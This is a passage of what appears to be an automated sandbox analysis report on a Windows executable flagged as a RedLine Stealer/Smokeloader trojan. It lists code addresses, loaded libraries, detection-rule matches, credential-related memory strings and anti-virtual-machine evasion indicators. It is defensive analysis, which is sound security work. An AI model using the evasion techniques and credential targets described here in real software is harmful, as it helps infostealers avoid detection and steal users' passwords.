                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00430E6C0_2_00430E6C
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00438E280_2_00438E28
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0042CFBA0_2_0042CFBA
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041204D0_2_0041204D
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004410570_2_00441057
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004150700_2_00415070
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004488000_2_00448800
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043D8D00_2_0043D8D0
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041E0830_2_0041E083
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0044915B0_2_0044915B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0045D15A0_2_0045D15A
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041316D0_2_0041316D
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040112C0_2_0040112C
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004279E00_2_004279E0
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041D1E90_2_0041D1E9
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004109FC0_2_004109FC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040D9940_2_0040D994
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0044F2440_2_0044F244
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041AA490_2_0041AA49
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041B2510_2_0041B251
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00429A5B0_2_00429A5B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004102180_2_00410218
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00410A330_2_00410A33
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00414A830_2_00414A83
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0044234A0_2_0044234A
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0040136E0_2_0040136E
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00457B300_2_00457B30
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004283340_2_00428334
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041EBEB0_2_0041EBEB
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00415C7E0_2_00415C7E
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004184130_2_00418413
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043A4FE0_2_0043A4FE
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00424C8D0_2_00424C8D
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043BCA40_2_0043BCA4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004165480_2_00416548
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004395350_2_00439535
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041764A0_2_0041764A
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0043D6000_2_0043D600
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004126B90_2_004126B9
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_004297300_2_00429730
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00434FAC0_2_00434FAC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422BC2C0_2_0422BC2C
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0420D43D0_2_0420D43D
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04206C080_2_04206C08
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421FC0B0_2_0421FC0B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042064720_2_04206472
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421047F0_2_0421047F
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04227C470_2_04227C47
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421D4500_2_0421D450
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0424F4AB0_2_0424F4AB
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421ACB00_2_0421ACB0
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421B4B80_2_0421B4B8
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423048F0_2_0423048F
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04229CC20_2_04229CC2
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422F4DF0_2_0422F4DF
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04205D110_2_04205D11
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042055400_2_04205540
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04236D430_2_04236D43
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042425B10_2_042425B1
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422859B0_2_0422859B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423B5C90_2_0423B5C9
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422A5D40_2_0422A5D4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421867A0_2_0421867A
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421EE520_2_0421EE52
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04215EE50_2_04215EE5
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04224EF40_2_04224EF4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042026DD0_2_042026DD
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423BF0B0_2_0423BF0B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423A7650_2_0423A765
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042167AF0_2_042167AF
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423979C0_2_0423979C
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422AFE90_2_0422AFE9
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042178B10_2_042178B1
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422D8BF0_2_0422D8BF
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423908F0_2_0423908F
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042310D30_2_042310D3
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042129200_2_04212920
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042299970_2_04229997
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422D2210_2_0422D221
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042352130_2_04235213
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04248A670_2_04248A67
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042122B40_2_042122B4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042412BE0_2_042412BE
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042342E70_2_042342E7
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0421E2EA0_2_0421E2EA
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042152D70_2_042152D7
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0423DB370_2_0423DB37
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0422C3410_2_0422C341
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0420E3B50_2_0420E3B5
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0420AB8F0_2_0420AB8F
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0420B3900_2_0420B390
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042303F50_2_042303F5
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0420DBFB0_2_0420DBFB
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0425D3C10_2_0425D3C1
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042493C20_2_042493C2
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042133D40_2_042133D4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeProcess token adjusted: Load DriverJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: String function: 00438E28 appears 39 times
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: String function: 0423D2D7 appears 48 times
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: String function: 0043D070 appears 51 times
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: String function: 0420A905 appears 38 times
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: String function: 0040E14E appears 52 times
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: String function: 0420E3B5 appears 36 times
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: String function: 004360E1 appears 144 times
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1720
                    Source: I5jG2Os8GA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: I5jG2Os8GA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0277947E CreateToolhelp32Snapshot,Module32First,0_2_0277947E
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7276
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\72706ed6-c709-4f73-b0d7-e0e3f2a15ee0Jump to behavior
                    Source: I5jG2Os8GA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3055237243.000000000444D000.00000004.00000020.00020000.00000000.sdmp, I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, I5jG2Os8GA.exe, 00000000.00000002.3055237243.000000000445B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: I5jG2Os8GA.exeReversingLabs: Detection: 89%
                    Source: unknownProcess created: C:\Users\user\Desktop\I5jG2Os8GA.exe "C:\Users\user\Desktop\I5jG2Os8GA.exe"
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1720
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: fltlib.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: my-global-render.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: I5jG2Os8GA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: I5jG2Os8GA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: I5jG2Os8GA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: I5jG2Os8GA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: I5jG2Os8GA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: I5jG2Os8GA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: I5jG2Os8GA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\dat\yijole\segod\dile62\ru.pdb source: I5jG2Os8GA.exe

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeUnpacked PE file: 0.2.I5jG2Os8GA.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeUnpacked PE file: 0.2.I5jG2Os8GA.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00464074 push B000468Ch; retn 0044h0_2_00464079
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00463CAD push esi; ret 0_2_00463CB6
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00403D6C push eax; mov dword ptr [esp], 00000000h0_2_00403D71
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00452768 push ecx; ret 0_2_0045277B
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04203FD3 push eax; mov dword ptr [esp], 00000000h0_2_04203FD8
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_042529CF push ecx; ret 0_2_042529E2
                    Source: I5jG2Os8GA.exeStatic PE information: section name: .text entropy: 7.870139503393558
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04202260 Sleep,ExitProcess,0_2_04202260
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_0-70809
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-70680
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-70682
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-70902
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_0-70853
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-70859
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_0425216F FindFirstFileExW,0_2_0425216F
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeCode function: 0_2_04252223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_04252223
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                    Source: Amcache.hve.14.drBinary or memory string: VMware
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                    Source: Amcache.hve.14.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                    Source: I5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.14.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                    Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                    Source: Amcache.hve.14.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.14.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
